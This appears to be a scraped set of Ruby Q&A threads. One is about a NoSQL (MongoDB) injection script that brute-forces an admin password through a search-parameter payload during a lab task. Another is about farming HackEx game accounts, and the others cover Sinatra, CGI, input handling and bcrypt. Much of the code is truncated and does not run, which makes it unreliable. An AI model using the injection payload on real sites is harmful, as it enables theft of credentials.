unexpected keyword_end MongoDB Injection - ruby

im doing one of the tasks to retrieve more information from the NoSQL database using ruby .everytime i run the code im getting syntax error
require 'httparty'
def check?(str)
resp = HTTParty.get("http://#{URL}/?
return resp.body =~ />admin</
#puts check?("d").inspect
#puts check?("aaa").inspect
CHARSET = ('a'..'z').to_a+('0'..'9').to_a+['-']
password = ""
While true
CHARSET.each do |c|
puts "Trying: #{c} for #{password}"
test = password+c
if check?("^#{test}.*$")
puts password

There is a typo while is a keyword and need to be written in downcase.
require 'httparty'
URL = "ptl-eb7cd0e0-778a277a.libcurl.so"
def check?(str)
resp = HTTParty.get(
return resp.body =~ />admin</
# puts check?("d").inspect
# puts check?("aaa").inspect
CHARSET = ('a'..'z').to_a + ('0'..'9').to_a + ['-']
password = ""
while true # `while` needs to be downcase
CHARSET.each do |c|
puts "Trying: #{c} for #{password}"
test = password + c
if check?("^#{test}.*$")
password += c
puts password
Btw. proper indention and some white improves readability a lot.

Its an issue with httparty gem.
First, install the same. also I made some changes in code.
The code is running but still not getting the result.
I have made below changes :
require 'httparty'
URL=(URI.encode 'myurl')
def check?(str)
resp = HTTParty.get(URI.encode "http://myurl/?search=admin%27%20%26%26%20this.password.match(#/{str}/)%00")
return resp.body =~ />admin
puts check?("5").inspect
puts check?("aaa").inspect
It is recommended to use URI.encode function.
I still trying to get the desired output.
I hope I will get the result.
You can modify the script or let me know if you had success in running the script.


loop through json array and retrieve one attribute, gives errors also

i am new to programming in ruby, and i am trying to get the value of json['earning_rate_hr'] but i get an error, in '[]': no implicit conversion of String into Integer (TypeError)
i know and i understand the error, however this is not my main question here is my file :
checkingchecker.rb :
#require_relative '../lib/hackex/net/typhoeus'
require_relative '../lib/hackex'
require 'rubygems'
require 'json'
file = 'accounts1.txt'
f = File.open file, 'r'
puts "MADE BY THE PEOPLE, FOR THE PEOPLE #madebylorax"
puts ""
puts "--------------------------------------------------------"
puts ""
while line = f.gets
line = line.chomp.split(';')
email, password = line
puts "logging in as " + email
HackEx.LoginDo(email, password) do |http, auth_token, user|
puts "getting info..."
user = HackEx::Request.Do(http, HackEx::Request.UserInfo(auth_token))['user']
puts "receieved user info!"
bank = HackEx::Request.Do(http, HackEx::Request.UserBank(auth_token))['user_bank']
puts "recieved bank info!"
json = HackEx::Request.Do(http, HackEx::Request.UserSpam(auth_token))['spam']
puts "recieved spam info!"
puts json['earning_rate_hr'] #error line, the error is because this is an array, and it cant be turned into integer, i was wondering if there is a way to use puts on it without trying to make it an integer
userchecking = bank["checking"]
checking = userchecking.scan(/.{1,3}/).join(',')
puts email + " has in Checking: BTC #{checking}"
puts ""
puts "--------------------------------------------------------"
puts ""
i tried to do puts json, it puts items like this one :
{"id"=>"9867351", "user_id"=>"289108", "victim_user_id"=>"1512021",
"", "spam_level"=>"50", "earning_rate_hr"=>"24300", "total_earning s"=>"13267800", "started_at"=>"2015-11-01 07:46:59",
"last_collected_at"=>"2015- 11-24 01:46:59"}
what i want to do is select the earning_rate_hr for each one of them and add them together, however i do not have a clue on how to do that, since the error is not fixed and i cant get the value of it
ps : i tried turning it into a Hash, and i also tried using .first, but .first only shows the firs one, i want to show all of them, thank you
I know you from line messenger, I haven't used ruby codes in a long time and this one keeps giving me cloudflare errors, I'm not sure if its because of server downtime/maintainance or whatever but yeah anyway heres your script, enjoy farming ;) -LineOne
PS, I changed a few strings to make it look a lil cleaner so you can see the spam income easier, and added the sleep (1) because sleeping for one second before reconnecting helps to prevent cloudflare errors
also you don't need to require json or rubygems in your hackex scripts because its required in the library so its all covered pre-user-input/script
require_relative 'libv5/lib/hackex'
while 1<2
print'Filename: '
file = fn+'.txt'
f = File.open file, 'r'
puts "MADE BY THE PEOPLE, FOR THE PEOPLE #madebylorax" #helped by lineone
puts ""
puts "--------------------------------------------------------"
puts ""
while line = f.gets
line = line.chomp.split(';')
email, password = line
HackEx.LoginDo(email, password) do |http, auth_token, user|
puts "Retrieving Info..."
user = HackEx::Request.Do(http, HackEx::Request.UserInfo(auth_token))['user']
bank = HackEx::Request.Do(http, HackEx::Request.UserBank(auth_token))['user_bank']
json = HackEx::Request.Do(http, HackEx::Request.UserSpam(auth_token))['spam']
json.each do |j|
earn_rate = j['earning_rate_hr']
total= j['total_earnings']
print "#{email}: current earnings: #{cash_count} per hour, Total earnings #{tot_count},"
userchecking = bank["checking"]
checking = userchecking.scan(/.{1,3}/).join(',')
puts " #{checking} BTC in Checking"
puts ""
puts "--------------------------------------------------------"
puts ""
sleep 1
Thats fine you can also calculate the total income of your farms by adding new variables at the top example a=0 then adding the number at the end a+=tot_count
This should help:
earning_rates = json.map{|e| e["earning_rate_hr"]}
puts "Earning rates per hour: #{earning_rates.join(" ")}"
puts "Sum of earning rates: #{earning_rates.map{|e| e.to_i}.inject{|sum, x| sum + x}}"

Ruby output is not displayed on the sinatra browser

I want to bulid a multi threaded application. If i do not use threads, everything works fine. When i try to use threads, then nothing is displayed on the browser. when i use the syntax 'puts "%s" %io.read' then it displays on the command prompt and not on the browser. Any help would be appreciated.
require 'sinatra'
require 'thread'
set :environment, :production
get '/price/:upc/:rtype' do
Webupc = "#{params[:upc]}"
Webformat = "#{params[:rtype]}"
MThread = Thread.new do
puts "inside thread"
puts "a = %s" %Webupc
puts "b = %s" %Webformat
#call the price
Maxupclen = 16
padstr = ""
padupc = ""
padlen = (Maxupclen - Webupc.length)
puts "format type: #{params[:rtype]}"
puts "UPC: #{params[:upc]}"
puts "padlen: %s" %padlen
if (Webformat == 'F')
puts "inside format"
if (padlen == 0 ) then
IO.popen("tstprcpd.exe #{Webupc}")
{ |io|
"%s" %io.read
elsif (padlen > 0 ) then
for i in 1 .. padlen
padstr = padstr + "0"
padupc = padstr + Webupc
puts "padupc %s" %padupc
IO.popen("tstprcpd.exe #{padupc}") { |io|
"%s" %io.read
elsif (padlen < 0 ) then
IO.popen("date /T") { |io|
"UPC length must be 16 digits or less." %io.read
Your code has several problems:
It is not formatted properly
You are using Uppercase names for variables; that makes them constants!
puts will not output to the browser, but to the console. The browser will recieve the return value of the block, i.e. the return value of the last statement in the block. Therefore, you need to build your output differently (see below).
You are never joining the thread
Here's a minimal sinatra app that uses a thread. However, the thread makes no sense in this case because you must wait for its termination anyway before you can output the result to the browser. In order to build the output I have used StringIO, which you can use with puts to build a multiline string conveniently. However, you could also simply initialize res with an empty string with res = "" and then append your lines to this string with res << "new line\n".
require 'sinatra'
require 'thread'
require 'stringio'
get '/' do
res = StringIO.new
th = Thread.new do
res.puts 'Hello, world!'

Recursion in Ruby isnt working like I think it should

I don't understand why this method isn't working. when I put in a value that should pass the if statement it doesn't work.
def getBase
puts "What is the base URL for the test?"
x = gets
if (x.include? 'http://') && ((x.split('.').at(x.split('.').length - 1).length) == 3)
return x
puts "That is in the incorrect format."
puts "Please format your url like this"
puts "http://example.com"
input 'http://test.com'
result: statement repeats and does not exit recursion
When you get input with gets it includes the newline \n at the end (from the user hitting return). So your x is actually "http://test.com\n".
To get rid of this use String#chomp:
x = gets.chomp
That should do it.
If the purpose is to enforce correct URL format and/or make sure it's an HTTP URL, why don't you use a tool designed to do that? Ruby's URI class is your friend:
require 'uri'
=> true
=> false
=> false
=> false
I'd write the code more like this:
require 'uri'
def get_base
loop do
puts "What is the base URL for the test?"
x = gets.chomp
uri = URI.parse(x)
return uri.to_s if uri.is_a?(URI::HTTP)
rescue URI::InvalidURIError
puts "That is in the incorrect format."
puts "Please format your URL like this:"
puts " http://example.com"
puts "Got: #{ get_base() }"

ruby cgi wont return method calls, but will return parameters

my environment: ruby 1.9.3p392 (2013-02-22 revision 39386) [x86_64-linux]
The thing is, I can make ruby return the parameters sent over GET. but when i'm trying to use them as arguements to my methods in if/else, ruby wont return anything and I end up with a blank page.
ph and pm return correctly:
node00.abit.dk 23:14:41:51:63
Connection to the database (MySQL) works fine
When I test the method newHostName it outputs correctly:
puts newHostName
returns (which is correct)
the code:
require 'cgi'
require 'sequel'
require 'socket'
require 'timeout'
DB = Sequel.connect(:adapter=>'mysql', :host=>'localhost', :database=>'nodes', :user=>'nodeuser', :password=>'...')
#cgi-part to work
#takes 2 parameters:
#hostname & macadd
cgi = CGI.new
puts cgi.header
p = cgi.params
ph = p['hostname']
pm = p['macadd']
def nodeLookup(hostnameargv)
hostname = DB[:basenode]
h = hostname[:hostname => hostnameargv]
h1 = h[:hostname]
h2 = h[:macadd]
ary = [h1, h2]
return ary
def lastHostName()
#TODO: replace with correct sequel-code and NOT raw SQL
DB.fetch("SELECT hostname FROM basenode ORDER BY id DESC LIMIT 1") do |row|
return row[:hostname]
def newHostName()
org = lastHostName
#Need this 'hack' to make ruby grep for the number
#nodename e.g 'node01.abit.dk'
var1 = org[4]
var2 = org[5]
var3 = var1 + var2
sum = var3.to_i + 1
#puts sum
sum = "node" + sum.to_s + ".abit.dk"
return sum
def insertNewNode(newhost, newmac)
newnode = DB[:basenode]
newnode.insert(:hostname => newhost, :macadd => newmac)
return "#{newnode.count}"
#puts ph
#puts pm
#puts newHostName
cgi.out() do
cgi.html do
if ph == "node00.abit.dk"
puts newHostName
puts nodeLookup(ph)
I feel like im missing something here. Any help is very much appreciated!
What about modify last lines of your code as followed? CGI HTML generation methods take a block and yield the return value of the block as their content. So you should make newHostName or nodeLookup(ph) as the return value of the block passed to cgi.html(), rather than puts sth, which prints the content to your terminal and return nil. That's why cgi.html() got an empty string (nil.to_s).
#puts newHostName
cgi.out() do
cgi.html do
if ph == "node00.abit.dk"
p.s. It's conventional to indent your ruby code with 2 spaces :-)

bcrypt-ruby password generation and checking

I was trying out the bcrypt-ruby gem and i wrote the following code to generate a random password and verify it
require 'bcrypt'
require 'securerandom'
def encrypt_token(tok)
def check_token(enc,tok)
g = BCrypt::Password.new(enc)
if tok==g
puts 'equal'
puts 'not equal'
s = SecureRandom.hex(12)
puts s
e = encrypt_token(s)
puts e
The code keeps printing 'not equal' instead of 'equal'. Where am I going wrong? Thanks :)
bcrypt has an automatic-salt feature. You can't compare two bcrypts of the same string, they'll be different.
Try to compare like this :
def check_token(enc,tok)
if enc == tok #We compare it with the unencrypted string.
puts 'equal'
puts 'not equal'
The trick is that when creating a new bcrypt, you end up with a Password object that overrides the == operator. It'll check if the password is correct against an unencrypted string.
Also because of this, be careful : in the example above, comparing enc == tok works.
Comparing tok == enc won't as you'll be using the standard == from the class String
Take a look at the doc and the source here :
